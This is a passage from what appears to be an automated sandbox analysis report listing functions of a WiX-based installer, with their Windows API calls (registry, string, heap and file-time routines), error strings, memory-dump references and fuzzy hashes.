                                                                                                                                                              • Instruction Fuzzy Hash: FB311A32600226ABD7208EA5CC44F6B3B99BF05774B22422CFD15DB292EB79CC0297D0
                                                                                                                                                              Function 008094FD Relevance: 7.6, APIs: 5, Instructions: 119registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 008095D5
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 00809610
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 0080962C
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 00809639
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 00809646
                                                                                                                                                                • Part of subcall function 00800FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,008095C2,00000001), ref: 00800FED
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close$InfoOpenQuery
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 796878624-0
                                                                                                                                                              • Opcode ID: cd373e8cce042c8f6c65d79ab09e5c0aad7717ab40db149df9bcf0bbac30c5fe
                                                                                                                                                              • Instruction ID: 94b3bf70ff0b2075c6ec28b58e8556c1b6cf6ab1414988456f6d3212494ae11c
                                                                                                                                                              • Opcode Fuzzy Hash: cd373e8cce042c8f6c65d79ab09e5c0aad7717ab40db149df9bcf0bbac30c5fe
                                                                                                                                                              • Instruction Fuzzy Hash: D9416072C0162DFFCF61AF94CD819ADFBB9FF24750F11416AE960B6162C7324E509A90
                                                                                                                                                              Function 007C8A07 Relevance: 7.6, APIs: 5, Instructions: 118stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,007C8BC8,007C972D,?,007C972D,?,?,007C972D,?,?), ref: 007C8A27
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,007C8BC8,007C972D,?,007C972D,?,?,007C972D,?,?), ref: 007C8A2F
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,007C8BC8,007C972D,?,007C972D,?), ref: 007C8A7E
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,007C8BC8,007C972D,?,007C972D,?), ref: 007C8AE0
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,007C8BC8,007C972D,?,007C972D,?), ref: 007C8B0D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString$lstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1657112622-0
                                                                                                                                                              • Opcode ID: c01ae2ff19227f8aec305bff570b3fd21f04f8cb592acebb255410a7fb296606
                                                                                                                                                              • Instruction ID: 1e26238c65cf470a2b6649bfc828b5c79bdf4be7ba9f8ce5ae46e417a71d25ad
                                                                                                                                                              • Opcode Fuzzy Hash: c01ae2ff19227f8aec305bff570b3fd21f04f8cb592acebb255410a7fb296606
                                                                                                                                                              • Instruction Fuzzy Hash: 81314472600108FFCB518F58CC45FAE3F6AFB48390F15841EF91987210CA799D90DB92
                                                                                                                                                              Function 007C74B7 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(007C53BD,WixBundleOriginalSource,?,?,007DA623,840F01E8,WixBundleOriginalSource,?,0082AA90,?,00000000,007C5445,00000001,?,?,ET|), ref: 007C74C3
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(007C53BD,007C53BD,00000000,00000000,?,?,007DA623,840F01E8,WixBundleOriginalSource,?,0082AA90,?,00000000,007C5445,00000001,?), ref: 007C752A
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get value of variable: %ls, xrefs: 007C74FD
                                                                                                                                                              • WixBundleOriginalSource, xrefs: 007C74BF
                                                                                                                                                              • Failed to get value as string for variable: %ls, xrefs: 007C7519
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
                                                                                                                                                              • API String ID: 3168844106-30613933
                                                                                                                                                              • Opcode ID: 866bbabbb087ebe0cb00df68c78ba67cd2aa76877e2f34934f92c1d8130bdd8c
                                                                                                                                                              • Instruction ID: 815e32a403a7e1c1fab7278d2080ecca5e4be0badf43271890d71f9b6ce2dd28
                                                                                                                                                              • Opcode Fuzzy Hash: 866bbabbb087ebe0cb00df68c78ba67cd2aa76877e2f34934f92c1d8130bdd8c
                                                                                                                                                              • Instruction Fuzzy Hash: 01018832944128EBCF269E54DC09F9E7B68EF00361F104168FD04EA220CB3A9E20EAD0
                                                                                                                                                              Function 007ED152 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,00000000,?,007ED148,00000000), ref: 007ED16D
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,007ED148,00000000), ref: 007ED179
                                                                                                                                                              • CloseHandle.KERNEL32(0080B518,00000000,?,00000000,?,007ED148,00000000), ref: 007ED186
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,007ED148,00000000), ref: 007ED193
                                                                                                                                                              • UnmapViewOfFile.KERNEL32(0080B4E8,00000000,?,007ED148,00000000), ref: 007ED1A2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$FileUnmapView
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 260491571-0
                                                                                                                                                              • Opcode ID: 95e98d6c9333383026e2381cb0e319fa0efaa7e2d65cc2a3a95b1c3d8fae61a1
                                                                                                                                                              • Instruction ID: 9f47132a92f7a8906a1440a30227c584e681724ee305e840e81fcb019bd39546
                                                                                                                                                              • Opcode Fuzzy Hash: 95e98d6c9333383026e2381cb0e319fa0efaa7e2d65cc2a3a95b1c3d8fae61a1
                                                                                                                                                              • Instruction Fuzzy Hash: B501F676502B59DFCB31AF66D88081AF7EABF55711316C93EE1A652930C375AC90CF40
                                                                                                                                                              Function 00808713 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00808820
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0080882A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$ErrorFileLastSystem
                                                                                                                                                              • String ID: clbcatq.dll$timeutil.cpp
                                                                                                                                                              • API String ID: 2781989572-961924111
                                                                                                                                                              • Opcode ID: 2987f5ae315cbef6b3d9c215a4fbcc8049d0d11d9e244d17e0a9842ea6f5b5c9
                                                                                                                                                              • Instruction ID: f64c94fe6f9de7ede66105d111512e549a3a264659511c7228384a81f1c23174
                                                                                                                                                              • Opcode Fuzzy Hash: 2987f5ae315cbef6b3d9c215a4fbcc8049d0d11d9e244d17e0a9842ea6f5b5c9
                                                                                                                                                              • Instruction Fuzzy Hash: D041D376A0021AE6D7609BB88C45B7F7765FF50700F648539A641F72D4EE35CE8087A1
                                                                                                                                                              Function 008036CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • VariantInit.OLEAUT32(000002C0), ref: 008036E6
                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 008036F6
                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 008037D5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant$AllocClearInitString
                                                                                                                                                              • String ID: xmlutil.cpp
                                                                                                                                                              • API String ID: 2213243845-1270936966
                                                                                                                                                              • Opcode ID: e06d4bbd38df1b2b9c19290d3d6bd44d63ccb72b91fc1b5b1bdb2bf41c0be9a4
                                                                                                                                                              • Instruction ID: 9612bb00844eab37eb7c548ad6c7f95219a39e2906df8a15f6eaebde466ab3ac
                                                                                                                                                              • Opcode Fuzzy Hash: e06d4bbd38df1b2b9c19290d3d6bd44d63ccb72b91fc1b5b1bdb2bf41c0be9a4
                                                                                                                                                              • Instruction Fuzzy Hash: 144146B5900229ABCB519FA5CC88EAAB7BCFF45710F1541B8FC05EB251DA35DE008B91
                                                                                                                                                              Function 00800E4F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,007E8E1B), ref: 00800EAA
                                                                                                                                                              • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,007E8E1B,00000000), ref: 00800EC8
                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,007E8E1B,00000000,00000000,00000000), ref: 00800F1E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Enum$InfoQuery
                                                                                                                                                              • String ID: regutil.cpp
                                                                                                                                                              • API String ID: 73471667-955085611
                                                                                                                                                              • Opcode ID: 07759e031775d0ecba1166dd7e3a12daa209088232eeaaa0924d66d0b804a7d7
                                                                                                                                                              • Instruction ID: 4096b91a5a5946bec908a4fa5c2e3945e4c29839342dabf0a5ac964d7ee6b491
                                                                                                                                                              • Opcode Fuzzy Hash: 07759e031775d0ecba1166dd7e3a12daa209088232eeaaa0924d66d0b804a7d7
                                                                                                                                                              • Instruction Fuzzy Hash: 6231817690112AFBDB318A94CD84FAFB76DFF04760F154069BD04FB290DB718E10AAA0
                                                                                                                                                              Function 007E8B17 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,007E8E57,00000000,00000000), ref: 007E8BD4
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to ensure there is space for related bundles., xrefs: 007E8B87
                                                                                                                                                              • Failed to open uninstall key for potential related bundle: %ls, xrefs: 007E8B43
                                                                                                                                                              • Failed to initialize package from related bundle id: %ls, xrefs: 007E8BBA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpen
                                                                                                                                                              • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                                                                                                                              • API String ID: 47109696-1717420724
                                                                                                                                                              • Opcode ID: 6d07c308422428f783831e5c6fd22aa80e4fe067de26638441408464128beb0a
                                                                                                                                                              • Instruction ID: cd9e22dd2696826b0f8eb35e6ca57e403156c9cc88d658d1b3f40e991d416f46
                                                                                                                                                              • Opcode Fuzzy Hash: 6d07c308422428f783831e5c6fd22aa80e4fe067de26638441408464128beb0a
                                                                                                                                                              • Instruction Fuzzy Hash: 5E21DEB2841659FBDF528E85CC06FEEBB78FF08311F104055F904A61A0DB799A20EB92
                                                                                                                                                              Function 007C3B15 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74memoryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,007C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B8), ref: 007C3B33
                                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,007C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B8,000001C7,00000100,?,80004005,00000000), ref: 007C3B3A
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                                • Part of subcall function 007C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BDB
                                                                                                                                                                • Part of subcall function 007C3BD3: HeapSize.KERNEL32(00000000,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BE2
                                                                                                                                                              • _memcpy_s.LIBCMT ref: 007C3B86
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocAllocateSize_memcpy_s
                                                                                                                                                              • String ID: memutil.cpp
                                                                                                                                                              • API String ID: 3406509257-2429405624
                                                                                                                                                              • Opcode ID: df1c2f0a3bd961d4b451f28e801a0a1b4516da561a44f6e14148d3ba9f1c800e
                                                                                                                                                              • Instruction ID: 39f1cce9e7ceacde5ba63e4f17bd7ce0dc44a9f9829f21e785a84873c2e3dc32
                                                                                                                                                              • Opcode Fuzzy Hash: df1c2f0a3bd961d4b451f28e801a0a1b4516da561a44f6e14148d3ba9f1c800e
                                                                                                                                                              • Instruction Fuzzy Hash: B811A271504519EBCB226F68CC48F6E3B59AF40764B05C21CFC159B262D639CF6096D0
                                                                                                                                                              Function 0080894D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00808991
                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008089B9
                                                                                                                                                              • GetLastError.KERNEL32 ref: 008089C3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastTime$FileSystem
                                                                                                                                                              • String ID: inetutil.cpp
                                                                                                                                                              • API String ID: 1528435940-2900720265
                                                                                                                                                              • Opcode ID: 36e887eba14345ec856cf7105aca7a76e6b8299eae502319a0161bcf5300722d
                                                                                                                                                              • Instruction ID: 5b0fe54e9dfcf55ddb03b5e066aacba282fb45d792635ecbf3f7824457d3c3b2
                                                                                                                                                              • Opcode Fuzzy Hash: 36e887eba14345ec856cf7105aca7a76e6b8299eae502319a0161bcf5300722d
                                                                                                                                                              • Instruction Fuzzy Hash: 8911E933A0153AEBD360ABA9CC45BBFBFA8FF44750F010125AE40F7240EA349D4086E2
                                                                                                                                                              Function 007D3AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,007D3FB5,feclient.dll,?,00000000,?,?,?,007C4B12), ref: 007D3B42
                                                                                                                                                                • Part of subcall function 008010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0080112B
                                                                                                                                                                • Part of subcall function 008010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00801163
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                                                                              • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                                                                                                              • API String ID: 1586453840-3596319545
                                                                                                                                                              • Opcode ID: 12574111abbdffa7e9c72aaade60959f22c80dbd7500db73d1111d6e958ccf6f
                                                                                                                                                              • Instruction ID: ba63f659dc845429737592dce634fff213afd3dfaa3d9c69ae41c5eced255801
                                                                                                                                                              • Opcode Fuzzy Hash: 12574111abbdffa7e9c72aaade60959f22c80dbd7500db73d1111d6e958ccf6f
                                                                                                                                                              • Instruction Fuzzy Hash: 1411B6B7B40208BBDB21DB95DC86EBABBB9FB10710F400067E500AB291D6759F81D722
                                                                                                                                                              Function 00800764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(007E12CF,00000000,00000000,?,?,?,00800013,007E12CF,007E12CF,?,00000000,0000FDE9,?,007E12CF,8007139F,Invalid operation for this state.), ref: 00800776
                                                                                                                                                              • WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,00800013,007E12CF,007E12CF,?,00000000,0000FDE9,?,007E12CF,8007139F), ref: 008007B2
                                                                                                                                                              • GetLastError.KERNEL32(?,?,00800013,007E12CF,007E12CF,?,00000000,0000FDE9,?,007E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008007BC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastWritelstrlen
                                                                                                                                                              • String ID: logutil.cpp
                                                                                                                                                              • API String ID: 606256338-3545173039
                                                                                                                                                              • Opcode ID: 25f165bb953735d654073a2f586cd2805bb88df3bff341cf0ab7662863839196
                                                                                                                                                              • Instruction ID: e287f1e7874a088e12c272d9dcb0e21d697ff14ad29fe67b59644c4d24ca808e
                                                                                                                                                              • Opcode Fuzzy Hash: 25f165bb953735d654073a2f586cd2805bb88df3bff341cf0ab7662863839196
                                                                                                                                                              • Instruction Fuzzy Hash: F811CA72A01129EBC3649A65DD44FABBB6CFB45760F114225FD00E7280EB79AD00CDE0
                                                                                                                                                              Function 007C120A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,007C523F,00000000,?), ref: 007C1248
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007C523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 007C1252
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
